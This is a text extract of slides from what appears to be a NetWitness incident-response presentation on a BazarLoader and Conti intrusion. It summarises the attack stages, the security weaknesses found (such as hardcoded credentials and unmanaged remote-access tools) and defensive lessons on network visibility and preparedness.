  • 31. BazarLoader Exotic Lily + Conti in Action Domain Spoofing Spear-Phishing Campaign Initial Compromise and Recon Cobalt Strike write, execute Exotic Lily Download additional tools Perform command-line recon Harvest local and network credentials Lateral Movement Powershell RDP: Splashtop, Anydesk Stolen VPN and Admin Credentials CONTI RDP toward DCs Atera Package Application Servers Exotic Lily C2 Leaks SSL Sessions to C2
  • 32. No Doubt on Attribution… It was absolutely easy to attribute the attack to the Conti Ransomware Gang, their banner was speaking for themselves:
  • 33. ©2022 NetWitness or its affiliates. All rights reserved. Enablers of Compromise
  • 34. Enablers of Compromise ▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider expansion of the radius and the magnitude of the attack. ▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc… These protocols, if exploited, could grant significant advantages to the attacker. ▪ Other traditional enablers are shared local administrative accounts, guessable credentials, unpatched public web servers or unauthenticated network shares. ▪ Nowadays, during targeted attacks, the attacker could use a myriad of tools and techniques to breach an organization’s network, steal sensitive information and compromise its operations. ▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers to successful cyber attacks. An enabler of compromise is a pre-existing condition to the attack.
  • 35. Script with Hardcoded Credentials We found cron script /root/inventory_queries.sh on a critical repository containing login credentials hardcoded, as illustrated here: Also, we found cron jobs running under the root user that had a service account, including the password, in cleartext.
  • 36. Enablers of compromise or careless users??? Unreported Teamviewer and Anydesk usage. During the analysis we found several systems connected to the company network with TeamViewer and Anydesk remote control software installed. The presence of remote control software in systems connected to the network may provide additional access points that bypass existing security measures Cracked software During the analysis we found evidence of systems using cracked Windows licenses. Powershell scripts with cleartext credentials Reviewing the network, we found several PowerShell scripts containing cleartext credentials. Root password in root’s .bash_history Reviewing the logs regarding the usage of Unix systems we stumbled upon another significant Enabler of Compromise… You can notice here…
  • 37. ©2022 NetWitness or its affiliates. All rights reserved. Lessons Learned
  • 38. C O N F I D E N T I A L It’s all about visibility… and a clean environment… ▪ The sophisticated nature of today’s threat landscape and actors continue to wreak havoc on enterprise infrastructures, to our surprise, this occurs upon betting and online casino services more than expected. ▪ Visibility is the key to protecting a network by actively looking for any security gap, vulnerability, on-going cyber attack, and any anomaly or wrong usage of network resources. ▪ The rule is “If you don’t find them, you can’t fix them”. ▪ Unfortunately, visibility is a major issue in the gaming industry. ▪ There could be several reasons why this is the case – the gaming industry may not understand the importance of network visibility, for example, or lack the tools and resources to get started. ▪ In any case, the lack of adequate response from security teams is due to the dependency on parameter-based security solutions that are not agile enough to deal with sophisticated threats or is due to the limited spectrum of cybersecurity controls these companies enforce nowadays.
  • 39. Visibility, Flexibility and Practice Comprehensive Visibility Preparedness Incident Response Retainer Major Incident Practice Drills Cyber Insurance Recovery Planning Preparedness Proactive Detection and Response Reactive Capabilities
  • 40. ©2022 NetWitness or its affiliates. All rights reserved. THANKS! C O N F I D E N T I A L